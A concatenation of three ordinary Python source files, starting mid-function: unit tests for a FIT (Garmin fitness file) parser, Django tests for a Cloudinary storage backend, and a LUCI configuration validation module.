(2, 'uint16'), (5, 'uint16'), (0, 'enum'),
],
# random serial number, random time, garmin, edge500, null, activity
data=[[558069241, 723842606, 1, 1036, (2 ** 16) - 1, 4]],
)
)
if data:
fit_data += data
# Prototcol version 1.0, profile version 1.52
header = pack('<2BHI4s', 14, 16, 152, len(fit_data), b'.FIT')
file_data = header + pack('<' + Crc.FMT, Crc.calculate(header)) + fit_data
return file_data + pack('<' + Crc.FMT, Crc.calculate(file_data))
def secs_to_dt(secs):
return datetime.datetime.utcfromtimestamp(secs + UTC_REFERENCE)
def testfile(filename):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), 'files', filename)
class FitFileTestCase(unittest.TestCase):
def test_basic_file_with_one_record(self, endian='<'):
f = FitFile(generate_fitfile(endian=endian))
f.parse()
self.assertEqual(f.profile_version, 1.52)
self.assertEqual(f.protocol_version, 1.0)
file_id = f.messages[0]
self.assertEqual(file_id.name, 'file_id')
for field in ('type', 0):
self.assertEqual(file_id.get_value(field), 'activity')
self.assertEqual(file_id.get(field).raw_value, 4)
for field in ('manufacturer', 1):
self.assertEqual(file_id.get_value(field), 'garmin')
self.assertEqual(file_id.get(field).raw_value, 1)
for field in ('product', 'garmin_product', 2):
self.assertEqual(file_id.get_value(field), 'edge500')
self.assertEqual(file_id.get(field).raw_value, 1036)
for field in ('serial_number', 3):
self.assertEqual(file_id.get_value(field), 558069241)
for field in ('time_created', 4):
self.assertEqual(file_id.get_value(field), secs_to_dt(723842606))
self.assertEqual(file_id.get(field).raw_value, 723842606)
for field in ('number', 5):
self.assertEqual(file_id.get_value(field), None)
def test_basic_file_big_endian(self):
self.test_basic_file_with_one_record('>')
def test_component_field_accumulaters(self):
# TODO: abstract CSV parsing
csv_fp = open(testfile('compressed-speed-distance-records.csv'), 'r')
csv_file = csv.reader(csv_fp)
next(csv_file) # Consume header
f = FitFile(testfile('compressed-speed-distance.fit'))
f.parse()
records = f.get_messages(name='record')
empty_record = next(records) # Skip empty record for now (sets timestamp via header)
# File's timestamp record is < 0x10000000, so field returns seconds
self.assertEqual(empty_record.get_value('timestamp'), 17217864)
# TODO: update using local_timestamp as offset, since we have this value as 2012 date
for count, (record, (timestamp, heartrate, speed, distance, cadence)) in enumerate(zip(records, csv_file)):
# No fancy datetime stuff, since timestamp record is < 0x10000000
fit_ts = record.get_value('timestamp')
self.assertIsInstance(fit_ts, int)
self.assertLess(fit_ts, 0x10000000)
self.assertEqual(fit_ts, int(timestamp))
self.assertEqual(record.get_value('heart_rate'), int(heartrate))
self.assertEqual(record.get_value('cadence'), int(cadence) if cadence != 'null' else None)
self.assertAlmostEqual(record.get_value('speed'), float(speed))
self.assertAlmostEqual(record.get_value('distance'), float(distance))
self.assertEqual(count, 753) # TODO: confirm size(records) = size(csv)
csv_fp.close()
def test_component_field_resolves_subfield(self):
fit_data = generate_fitfile(
generate_messages(
# event (21), local message 1
mesg_num=21, local_mesg_num=1, field_defs=[
# event, event_type, data16
(0, 'enum'), (1, 'enum'), (2, 'uint16'),
],
data=[[0, 0, 2]],
)
)
f = FitFile(fit_data)
f.parse()
event = f.messages[1]
self.assertEqual(event.name, 'event')
for field in ('event', 0):
self.assertEqual(event.get_value(field), 'timer')
self.assertEqual(event.get(field).raw_value, 0)
for field in ('event_type', 1):
self.assertEqual(event.get_value(field), 'start')
self.assertEqual(event.get(field).raw_value, 0)
# Should be able to reference by original field name,
# component field name, subfield name, and then the field def_num of both
# the original field and component field
for field in ('timer_trigger', 'data', 3):
self.assertEqual(event.get_value(field), 'fitness_equipment')
self.assertEqual(event.get(field).raw_value, 2)
# Component field should be left as is
for field in ('data16', 2):
self.assertEqual(event.get_value(field), 2)
def test_subfield_components(self):
# sore = 123, opponent_score = 456, total = 29884539
sport_point_value = 123 + (456 << 16)
# rear_gear_num = 4, rear_gear, = 20, front_gear_num = 2, front_gear = 34
gear_chance_value = 4 + (20 << 8) + (2 << 16) + (34 << 24)
fit_data = generate_fitfile(
generate_messages(
# event (21), local message 1
mesg_num=21, local_mesg_num=1, field_defs=[
# event, data
(0, 'enum'), (3, 'uint32'),
],
data=[
# sport point
[33, sport_point_value],
# front gear change
[42, gear_chance_value],
],
)
)
f = FitFile(fit_data)
f.parse()
sport_point = f.messages[1]
self.assertEqual(sport_point.name, 'event')
for field in ('event', 0):
self.assertEqual(sport_point.get_value(field), 'sport_point')
self.assertEqual(sport_point.get(field).raw_value, 33)
for field in ('sport_point', 'data', 3):
# Verify raw numeric value
self.assertEqual(sport_point.get_value(field), sport_point_value)
for field in ('score', 7):
self.assertEqual(sport_point.get_value(field), 123)
for field in ('opponent_score', 8):
self.assertEqual(sport_point.get_value(field), 456)
gear_change = f.messages[2]
self.assertEqual(gear_change.name, 'event')
for field in ('event', 0):
self.assertEqual(gear_change.get_value(field), 'front_gear_change')
self.assertEqual(gear_change.get(field).raw_value, 42)
for field in ('gear_change_data', 'data', 3):
# Verify raw numeric value
self.assertEqual(gear_change.get_value(field), gear_chance_value)
for field in ('front_gear_num', 9):
self.assertEqual(gear_change.get_value(field), 2)
for field in ('front_gear', 10):
self.assertEqual(gear_change.get_value(field), 34)
for field in ('rear_gear_num', 11):
self.assertEqual(gear_change.get_value(field), 4)
for field in ('rear_gear', 12):
self.assertEqual(gear_change.get_value(field), 20)
def test_parsing_edge_500_fit_file(self):
self._csv_test_helper(
'garmin-edge-500-activity.fit',
'garmin-edge-500-activity-records.csv')
def test_parsing_fenix_5_bike_fit_file(self):
self._csv_test_helper(
'garmin-fenix-5-bike.fit',
'garmin-fenix-5-bike-records.csv')
def test_parsing_fenix_5_run_fit_file(self):
self._csv_test_helper(
'garmin-fenix-5-run.fit',
'garmin-fenix-5-run-records.csv')
def test_parsing_fenix_5_walk_fit_file(self):
self._csv_test_helper(
'garmin-fenix-5-walk.fit',
'garmin-fenix-5-walk-records.csv')
def test_parsing_edge_820_fit_file(self):
self._csv_test_helper(
'garmin-edge-820-bike.fit',
'garmin-edge-820-bike-records.csv')
def _csv_test_helper(self, fit_file, csv_file):
csv_fp = open(testfile(csv_file), 'r')
csv_messages = csv.reader(csv_fp)
field_names = next(csv_messages) # Consume header
f = FitFile(testfile(fit_file))
messages = f.get_messages(name='record')
# For fixups
last_valid_lat, last_valid_long = None, None
for message, csv_message in zip(messages, csv_messages):
for csv_index, field_name in enumerate(field_names):
fit_value, csv_value = message.get_value(field_name), csv_message[csv_index]
if field_name == 'timestamp':
# Adjust GMT to PDT and format
fit_value = (fit_value - datetime.timedelta(hours=7)).strftime("%a %b %d %H:%M:%S PDT %Y")
# Track last valid lat/longs
if field_name == 'position_lat':
if fit_value is not None:
last_valid_lat = fit_value
if field_name == 'position_long':
if fit_value is not None:
last_valid_long = fit_value
# ANT FIT SDK Dump tool does a bad job of logging invalids, so fix them
if fit_value is None:
# ANT FIT SDK Dump tool cadence reports invalid as 0
if field_name == 'cadence' and csv_value == '0':
csv_value = None
# ANT FIT SDK Dump tool invalid lat/lng reports as last valid
if field_name == 'position_lat':
fit_value = last_valid_lat
if field_name == 'position_long':
fit_value = last_valid_long
if isinstance(fit_value, int):
csv_value = int(fit_value)
if csv_value == '':
csv_value = None
if isinstance(fit_value, float):
# Float comparison
self.assertAlmostEqual(fit_value, float(csv_value))
else:
self.assertEqual(fit_value, csv_value,
msg="For %s, FIT value '%s' did not match CSV value '%s'" % (field_name, fit_value, csv_value))
try:
next(messages)
self.fail(".FIT file had more than csv file")
except StopIteration:
pass
try:
next(csv_messages)
self.fail(".CSV file had more messages than .FIT file")
except StopIteration:
pass
csv_fp.close()
def test_developer_types(self):
"""Test that a file with developer types in it can be parsed"""
FitFile(testfile('developer-types-sample.fit')).parse()
FitFile(testfile('20170518-191602-1740899583.fit')).parse()
FitFile(testfile('DeveloperData.fit')).parse()
def test_invalid_crc(self):
try:
FitFile(testfile('activity-filecrc.fit')).parse()
self.fail("Didn't detect an invalid CRC")
except FitCRCError:
pass
def test_unexpected_eof(self):
try:
with warnings.catch_warnings(record=True):
FitFile(testfile('activity-unexpected-eof.fit')).parse()
self.fail("Didn't detect an unexpected EOF")
except FitEOFError:
pass
def test_chained_file(self):
FitFile(testfile('activity-settings.fit')).parse()
def test_invalid_chained_files(self):
"""Detect errors when files are chained together
Note that 'chained' means just concatinated in this case
"""
try:
FitFile(testfile('activity-activity-filecrc.fit')).parse()
self.fail("Didn't detect a CRC error in the chained file")
except FitCRCError:
pass
try:
FitFile(testfile('activity-settings-corruptheader.fit')).parse()
self.fail("Didn't detect a header error in the chained file")
except FitHeaderError:
pass
try:
FitFile(testfile('activity-settings-nodata.fit')).parse()
self.fail("Didn't detect an EOF error in the chaned file")
except FitEOFError:
pass
def test_valid_files(self):
"""Test that parsing a bunch of random known-good files works"""
for x in ('2013-02-06-12-11-14.fit', '2015-10-13-08-43-15.fit',
'Activity.fit', 'Edge810-Vector-2013-08-16-15-35-10.fit',
'MonitoringFile.fit', 'Settings.fit', 'Settings2.fit',
'WeightScaleMultiUser.fit', 'WeightScaleSingleUser.fit',
'WorkoutCustomTargetValues.fit', 'WorkoutIndividualSteps.fit',
'WorkoutRepeatGreaterThanStep.fit', 'WorkoutRepeatSteps.fit',
'activity-large-fenxi2-multisport.fit', 'activity-small-fenix2-run.fit',
'antfs-dump.63.fit', 'sample-activity-indoor-trainer.fit',
'sample-activity.fit', 'garmin-fenix-5-bike.fit',
'garmin-fenix-5-run.fit', 'garmin-fenix-5-walk.fit',
'garmin-edge-820-bike.fit', 'null_compressed_speed_dist.fit'):
FitFile(testfile(x)).parse()
def test_units_processor(self):
for x in ('2013-02-06-12-11-14.fit', '2015-10-13-08-43-15.fit',
'Activity.fit', 'Edge810-Vector-2013-08-16-15-35-10.fit',
'MonitoringFile.fit', 'Settings.fit', 'Settings2.fit',
'WeightScaleMultiUser.fit', 'WeightScaleSingleUser.fit',
'WorkoutCustomTargetValues.fit', 'WorkoutIndividualSteps.fit',
'WorkoutRepeatGreaterThanStep.fit', 'WorkoutRepeatSteps.fit',
'activity-large-fenxi2-multisport.fit', 'activity-small-fenix2-run.fit',
'antfs-dump.63.fit', 'sample-activity-indoor-trainer.fit',
'sample-activity.fit', 'garmin-fenix-5-bike.fit',
'garmin-fenix-5-run.fit', 'garmin-fenix-5-walk.fit',
'garmin-edge-820-bike.fit'):
FitFile(testfile(x), data_processor=StandardUnitsDataProcessor()).parse()
def test_int_long(self):
"""Test that ints are properly shifted and scaled"""
with FitFile(testfile('event_timestamp.fit')) as f:
assert f.messages[-1].fields[1].raw_value == 863.486328125
def test_elemnt_bolt_developer_data_id_without_application_id(self):
"""Test that a file without application id set inside developer_data_id is parsed
(as seen on ELEMNT BOLT with firmware version WB09-1507)"""
FitFile(testfile('elemnt-bolt-no-application-id-inside-developer-data-id.fit')).parse()
def test_multiple_header(self):
f = FitFile(testfile('sample_mulitple_header.fit'))
assert len(f.messages) == 3023
def test_speed(self):
f = FitFile(testfile('2019-02-17-062644-ELEMNT-297E-195-0.fit'))
avg_speed = list(f.get_messages('session'))[0].get_values().get('avg_speed')
self.assertEqual(avg_speed, 5.86)
def test_mismatched_field_size(self):
f = FitFile(testfile('coros-pace-2-cycling-misaligned-fields.fit'))
with warnings.catch_warnings(record=True) as w:
f.parse()
assert w
assert all("falling back to byte encoding" in str(x) for x in w)
self.assertEqual(len(f.messages), 11293)
def test_unterminated_file(self):
f = FitFile(testfile('nick.fit'), check_crc=False)
with warnings.catch_warnings(record=True) as w:
f.parse()
def test_developer_data_thread_safe(self):
"""
Test that a file with developer types in it can be parsed thread-safe.
This test opens 2 FIT files and tests whether the dev_types of one does not change the dev_types of the other.
"""
fit_file_1 = FitFile(testfile('developer-types-sample.fit'))
field_description_count = 0
for message in fit_file_1.get_messages():
if message.mesg_type.name == "field_description":
field_description_count += 1
if field_description_count >= 4:
# Break after final field description message
break
fit_file_2 = FitFile(testfile('developer-types-sample.fit'))
for message in fit_file_2.get_messages():
if message.mesg_type.name == "developer_data_id":
break
try:
fit_file_1.parse()
except FitParseError:
self.fail("parse() unexpectedly raised a FitParseError")
# TODO:
# * Test Processors:
# - process_type_<>, process_field_<>, process_units_<>, process_message_<>
if __name__ == '__main__':
unittest.main()
|
|
import errno
import os.path
from requests.exceptions import HTTPError
import cloudinary.uploader
from django.test import SimpleTestCase, override_settings
from django.core.files.base import ContentFile
from django.conf import settings
from cloudinary_storage.storage import (MediaCloudinaryStorage, ManifestCloudinaryStorage, StaticCloudinaryStorage,
StaticHashedCloudinaryStorage, RESOURCE_TYPES)
from cloudinary_storage import app_settings
from tests.tests.test_helpers import get_random_name, import_mock
mock = import_mock()
TAG = get_random_name()
class CloudinaryMediaStorageTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
super(CloudinaryMediaStorageTests, cls).setUpClass()
cls.file_content = b'Content of file'
cls.storage = MediaCloudinaryStorage(tag=TAG, resource_type='raw')
cls.file_name, cls.file = cls.upload_file()
@classmethod
def upload_file(cls, prefix='', directory_name=''):
file_name = prefix + directory_name + get_random_name()
content = ContentFile(cls.file_content)
file_name = cls.storage.save(file_name, content)
return file_name, content
def test_file_exists_after_upload(self):
self.assertTrue(self.storage.exists(self.file_name))
def test_file_doesnt_exist_without_upload(self):
file_name = get_random_name()
self.assertFalse(self.storage.exists(file_name))
def test_file_doesnt_exists_after_deletion(self):
file_name, file = self.upload_file()
self.storage.delete(file_name)
self.assertFalse(self.storage.exists(file_name))
@mock.patch('cloudinary_storage.storage.requests.head')
def test_exists_raises_http_error(self, head_mock):
response = head_mock.return_value
response.status_code = 500
response.raise_for_status.side_effect = HTTPError
with self.assertRaises(HTTPError):
self.storage.exists(get_random_name())
def test_delete_returns_true_when_file_existed(self):
file_name, file = self.upload_file()
self.assertTrue(self.storage.delete(file_name))
def test_delete_returns_false_when_file_didnt_exist(self):
file_name = get_random_name()
self.assertFalse(self.storage.delete(file_name))
def test_url(self):
url = self.storage.url('name')
self.assertTrue(url.startswith('http'))
def test_size_of_existing_file(self):
size = self.storage.size(self.file_name)
self.assertEqual(size, self.file.size)
def test_size_of_not_existing_file_returns_none(self):
file_name = get_random_name()
size = self.storage.size(file_name)
self.assertEqual(size, None)
def test_opened_file_has_correct_content(self):
file = self.storage.open(self.file_name)
self.assertEqual(file.read(), self.file_content)
def test_opening_not_existing_file_raises_error(self):
with self.assertRaises(IOError):
self.storage.open('name')
@mock.patch('cloudinary_storage.storage.requests.get')
def test_opening_when_cloudinary_fails_raises_error(self, get_mock):
response = get_mock.return_value
response.status_code = 500
response.raise_for_status.side_effect = HTTPError
with self.assertRaises(IOError):
self.storage.open('name')
def test_get_available_name(self):
name = 'name'
available_name = self.storage.get_available_name(name)
self.assertEqual(name, available_name)
def test_get_available_name_with_max_length(self):
name = 'name'
available_name = self.storage.get_available_name(name, 2)
self.assertEqual('na', available_name)
def test_get_available_name_with_max_length_bigger_than_name_length(self):
name = 'name'
available_name = self.storage.get_available_name(name, 10)
self.assertEqual(name, available_name)
def test_list_dir(self):
file_2_name, file_2 = self.upload_file(prefix='folder/')
try:
self.assertEqual(self.storage.listdir(''), (['media'], []))
file_1_tail = self.file_name.replace('media/', '', 1)
self.assertEqual(self.storage.listdir('media/'), (['folder'], [file_1_tail]))
file_2_tail = file_2_name.replace('media/folder/', '', 1)
self.assertEqual(self.storage.listdir('media/folder'),
([], [file_2_tail]))
finally:
self.storage.delete(file_2_name)
def test_file_with_windows_path_uploaded_and_exists(self):
file_name, file = self.upload_file(directory_name='windows\\styled\\path\\')
try:
self.assertTrue(self.storage.exists(file_name))
finally:
self.storage.delete(file_name)
def test_prefix_configuration(self):
with override_settings(CLOUDINARY_STORAGE={'PREFIX': 'test/prefix'}):
self.assertEqual(self.storage._get_prefix(), 'test/prefix')
self.assertTrue(self.storage._prepend_prefix('filename').startswith('test/prefix'))
@classmethod
def tearDownClass(cls):
super(CloudinaryMediaStorageTests, cls).tearDownClass()
cls.storage.delete(cls.file_name)
class ManifestCloudinaryStorageTests(SimpleTestCase):
def test_manifest_is_saved_to_proper_location(self):
storage = ManifestCloudinaryStorage()
file = ContentFile(b'Dummy manifest')
name = 'name'
storage.save(name, file)
expected_path = os.path.join(app_settings.STATICFILES_MANIFEST_ROOT, name)
try:
self.assertTrue(os.path.exists(expected_path))
finally:
try:
os.remove(expected_path)
except (IOError, OSError) as e:
if e.errno != errno.ENOENT:
raise
class StaticCloudinaryStorageTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
super(StaticCloudinaryStorageTests, cls).setUpClass()
cls.storage = StaticCloudinaryStorage(tag=get_random_name())
name = get_random_name()
cls.content = b'some content'
cls.file = ContentFile(cls.content)
cls.name = cls.storage.save(name, cls.file)
@override_settings(DEBUG=True)
def test_url_with_debug_true(self):
self.assertIn(settings.STATIC_URL, self.storage.url('name'))
def test_url_with_debug_false(self):
self.assertIn('cloudinary', self.storage.url('name'))
def test_file_exists_with_the_same_name_as_before_save(self):
self.assertTrue(self.storage.exists(self.name))
@mock.patch.object(MediaCloudinaryStorage, '_save')
def test_file_wont_be_uploaded_with_the_same_content(self, save_mock):
self.storage.save(self.name, self.file)
self.assertFalse(save_mock.called)
@mock.patch.object(MediaCloudinaryStorage, '_save')
def test_file_will_be_uploaded_with_different_content(self, save_mock):
changed_file = ContentFile(b'changed content')
self.storage.save(self.name, changed_file)
save_mock.assert_called_once_with(self.name, changed_file)
def test_get_file_extension_returns_none_for_file_without_extension(self):
extension = self.storage._get_file_extension('file-with-accidental-ending-jpg')
self.assertIsNone(extension)
def test_get_file_extension_returns_correct_file_extension(self):
extension = self.storage._get_file_extension('file.png.jpg')
self.assertEqual(extension, 'jpg')
def test_get_file_extension_converts_extension_to_lowercase(self):
extension = self.storage._get_file_extension('file.JPG')
self.assertEqual(extension, 'jpg')
def test_get_resource_type_returns_default_resource_type_for_file_without_extension(self):
resource_type = self.storage._get_resource_type('file-without-extension')
self.assertEqual(resource_type, self.storage.RESOURCE_TYPE)
def test_get_resource_type_returns_default_resource_type_for_file_with_js_extension(self):
resource_type = self.storage._get_resource_type('file.js')
self.assertEqual(resource_type, self.storage.RESOURCE_TYPE)
def test_get_resource_type_returns_image_resource_type_for_file_with_jpg_extension(self):
resource_type = self.storage._get_resource_type('file.jpg')
self.assertEqual(resource_type, RESOURCE_TYPES['IMAGE'])
def test_get_resource_type_returns_video_resource_type_for_file_with_avi_extension(self):
resource_type = self.storage._get_resource_type('file.avi')
self.assertEqual(resource_type, RESOURCE_TYPES['VIDEO'])
def test_remove_extension_for_non_raw_file_leaves_name_intact_when_raw_file(self):
name = self.storage._remove_extension_for_non_raw_file('file.css')
self.assertEqual(name, 'file.css')
def test_remove_extension_for_non_raw_file_leaves_name_intact_when_file_without_extension(self):
name = self.storage._remove_extension_for_non_raw_file('file')
self.assertEqual(name, 'file')
def test_remove_extension_for_non_raw_file_removes_extension_when_file_is_jpg(self):
name = self.storage._remove_extension_for_non_raw_file('file.jpg')
self.assertEqual(name, 'file')
@mock.patch.object(cloudinary.uploader, 'upload')
def test_upload_uses_remove_extension_for_non_raw_file(self, cloudinary_upload_mock):
self.storage._upload('name.jpg', 'content')
resource_type = self.storage._get_resource_type('name.jpg')
cloudinary_upload_mock.assert_called_once_with('content', public_id='name', resource_type=resource_type,
invalidate=True, tags=self.storage.TAG)
@classmethod
def tearDownClass(cls):
super(StaticCloudinaryStorageTests, cls).tearDownClass()
cls.storage.delete(cls.name)
class StaticHashedCloudinaryStorageTests(SimpleTestCase):
@mock.patch('cloudinary_storage.storage.finders.find')
def test_hashed_name_raises_error_when_file_not_found(self, find_mock):
storage = StaticHashedCloudinaryStorage()
not_existing_file = get_random_name()
find_mock.return_value = not_existing_file
with self.assertRaises(ValueError):
storage.hashed_name(not_existing_file)
def test_existing_manifest_is_deleted_before_new_is_saved(self):
storage = StaticHashedCloudinaryStorage()
with mock.patch.object(storage, 'manifest_storage') as manifest_storage_mock:
manifest_storage_mock.exists.return_value = True
storage.save_manifest()
manifest_storage_mock.delete.assert_called_once_with('staticfiles.json')
def test_add_unix_path_keys_to_paths(self):
storage = StaticHashedCloudinaryStorage()
paths = {
'dir/1': 1,
'dir\\2': 2
}
expected_paths = paths.copy()
expected_paths['dir/2'] = 2
storage.add_unix_path_keys_to_paths(paths)
self.assertEqual(paths, expected_paths)
|
|
# Copyright 2015 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Defines validation rules for configuration files.
Configurations requested with store_last_good=True are automatically validated
against rules defined using this module. Otherwise, validation.is_defined_for
and validation.validate can be used to validate configs in your code.
Example:
# Configs foo.cfg in all project config sets must be valid protobuf messages.
validation.project_config_rule('foo.cfg', config_pb2.FooCfg)
validation.validate('projects/bar', 'foo.cfg', 'invalid content')
# Will raise ValueError
Example with custom validation:
@validation.project_config_rule('foo.cfg', config_pb2.FooCfg)
def validate_foo(cfg, ctx):
if cfg.bar < 0:
ctx.error('bar must be non-negative: %d', cfg.bar)
validation.validate('projects/baz', 'foo.cfg', 'bar: -1')
# Will raise ValueError
"""
import collections
import re
from six.moves import urllib
from . import common
from . import validation_context
__all__ = [
'Context',
'Message',
'RuleSet',
'is_defined_for',
'is_valid',
'project_config_rule',
'ref_config_rule',
'rule',
'self_rule',
'validate',
]
Message = validation_context.Message
class Context(validation_context.Context):
"""A validation context with config metadata information."""
config_set = None
path = None
@property
def service_id(self):
if self.config_set:
m = common.SERVICE_CONFIG_SET_RGX.match(self.config_set)
if m:
return m.group(1)
return None
@property
def project_id(self):
if self.config_set:
m = common.PROJECT_CONFIG_SET_RGX.match(self.config_set)
if m:
return m.group(1)
m = common.REF_CONFIG_SET_RGX.match(self.config_set)
if m:
return m.group(1)
return None
@property
def ref(self):
if self.config_set:
m = common.REF_CONFIG_SET_RGX.match(self.config_set)
if m:
return m.group(2)
return None
def is_valid_service_id(service_id):
return bool(common.SERVICE_ID_RGX.match(service_id))
def is_valid_project_id(service_id):
return bool(common.PROJECT_ID_RGX.match(service_id))
def is_valid_ref_name(ref):
return bool(common.REF_NAME_RGX.match(ref))
def is_valid_secure_url(url):
"""Returns True if the URL is valid and secure, except for localhost."""
parsed = urllib.parse.urlparse(url)
if not parsed.netloc:
return False
if parsed.hostname in ('localhost', '127.0.0.1', '::1'):
return parsed.scheme in ('http', 'https')
return parsed.scheme == 'https'
ConfigPattern = collections.namedtuple(
'ConfigPattern',
[
'config_set', # config_set pattern, see compile_pattern().
'path', # path pattern, see compile_pattern().
])
def rule(config_set, path, dest_type=None, rule_set=None):
"""Creates a validation rule, that can act as a decorator.
Just calling the function defines a validation rule that verifies that a
config file is convertible to |dest_type|. Usage:
validation.rule('projects/chromium', 'foo.cfg', myconfig_pb2.FooCfg)
If the rule is used as decorator, the function being decorated is used for
further validation. It should have the following parameters:
* cfg: the converted config to be validated.
* ctx (Context): used to report validation errors. It may have
"config_set" and/or "path" attributes set.
Usage:
@validation.rule('projects/chromium', 'foo.cfg', myconfig_pb2.FooCfg)
def validate_foo(cfg, ctx):
if cfg.bar < 0:
ctx.error('bar cannot be negative: %d', cfg.bar)
|config_set| and |path| are patterns that determine if a rule is applicable
to a config. Both |config_set| and |path| patterns must match. See
compile_pattern's docstring for the definition of "pattern".
Args:
config_set (str): pattern for config set, see compile_pattern.
path (str): pattern for path, see compile_pattern.
dest_type (type): if specified, config contents will be converted to
|dest_type| before calling the decorated function.
Currently only protobuf messages are supported. If a config cannot be
converted, it is considered invalid.
rule_set (RuleSet): target rule set, defaults to the global
DEFAULT_RULE_SET.
Returns:
A rule. Calling rule.remove() will remove the rule from the rule set.
"""
rule_set = rule_set or DEFAULT_RULE_SET
new_rule = Rule(config_set, path, dest_type)
rule_set.add(new_rule)
return new_rule
def project_config_rule(*args, **kwargs):
"""Shortcut for rule() for project configs."""
return rule(
'regex:%s' % common.PROJECT_CONFIG_SET_RGX.pattern,
*args, **kwargs)
def ref_config_rule(*args, **kwargs):
"""Shortcut for rule() for ref configs."""
return rule(
'regex:%s' % common.REF_CONFIG_SET_RGX.pattern,
*args, **kwargs)
def self_rule(*args, **kwargs):
"""Shortcut for rule() for current appid."""
return rule(common.self_config_set(), *args, **kwargs)
def is_defined_for(config_set, path):
"""Returns True if validation is defined for given config_set and path."""
return DEFAULT_RULE_SET.is_defined_for(config_set, path)
def validate(config_set, path, content, ctx=None):
"""Validates a config.
If ctx is not specified, raises a ValueError on a first validation error.
"""
DEFAULT_RULE_SET.validate(config_set, path, content, ctx=ctx)
def is_valid(config_set, path, content):
"""Returns True if the config is valid."""
try:
validate(config_set, path, content)
return True
except ValueError:
return False
class Rule(object):
"""Validates a config if config_set and path match a predicate.
See rule()'s docstring for more info.
"""
rule_set = None
def __init__(self, config_set, path, dest_type=None):
self.config_set = config_set
self.path = path
self.config_set_fn = compile_pattern(config_set)
self.path_fn = compile_pattern(path)
common._validate_dest_type(dest_type)
self.dest_type = dest_type
self.validator_funcs = []
def match(self, config_set, path):
"""Returns True if this rule is applicable to |config_set| and |path|."""
return self.config_set_fn(config_set) and self.path_fn(path)
def validate(self, config_set, path, content, ctx):
try:
cfg = common._convert_config(content, self.dest_type)
except common.ConfigFormatError as ex:
ctx.error('%s', ex)
return
ctx.config_set = config_set
ctx.path = path
for f in self.validator_funcs:
f(cfg, ctx)
def __call__(self, func):
"""Adds |func| to the list of validation functions. Used as a decorator."""
assert func
assert hasattr(func, '__call__')
self.validator_funcs.append(func)
func.rule = self
return func
def remove(self):
"""Removes this rule from its ruleset."""
if self.rule_set:
if self in self.rule_set.rules:
self.rule_set.rules.remove(self)
self.rule_set = None
class RuleSet(object):
def __init__(self):
self.rules = []
def add(self, new_rule):
assert isinstance(new_rule, Rule)
new_rule.rule_set = self
self.rules.append(new_rule)
def validate(self, config_set, path, content, ctx=None):
ctx = ctx or Context.raise_on_error()
assert config_set
assert path
assert content is not None
assert isinstance(ctx, Context)
for r in self.rules:
if r.match(config_set, path):
r.validate(config_set, path, content, ctx)
def is_defined_for(self, config_set, path):
return any(r.match(config_set, path) for r in self.rules)
def patterns(self):
"""Returns a set of all config patterns that this rule_set can validate.
Returns:
A set of ConfigPattern objects.
"""
return set(
ConfigPattern(config_set=r.config_set, path=r.path)
for r in self.rules
)
def compile_pattern(pattern):
"""Compiles a pattern to a predicate function.
A pattern is a "<kind>:<value>" pair, where kind can be "text" (default) or
"regex" and value interpretation depends on the kind:
regex: value must be a regular expression. If it does not start/end with
^/$, they are added automatically.
text: exact string.
If colon is not present in the pattern, it is treated as "text:<pattern>".
Returns:
func (s: string): bool
Raises:
ValueError if |pattern| is malformed.
"""
if not isinstance(pattern, basestring):
raise ValueError('Pattern must be a string')
if ':' in pattern:
kind, value = pattern.split(':', 2)
else:
kind = 'text'
value = pattern
if kind in ('text', 'exact'):
return lambda s: s == value
if kind == 'regex':
if not value.startswith('^'):
value = '^' + value
if not value.endswith('$'):
value = value + '$'
try:
regex = re.compile(value)
except re.error as ex:
raise ValueError(ex.message)
return regex.match
raise ValueError('Invalid pattern kind: %s' % kind)
DEFAULT_RULE_SET = RuleSet()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.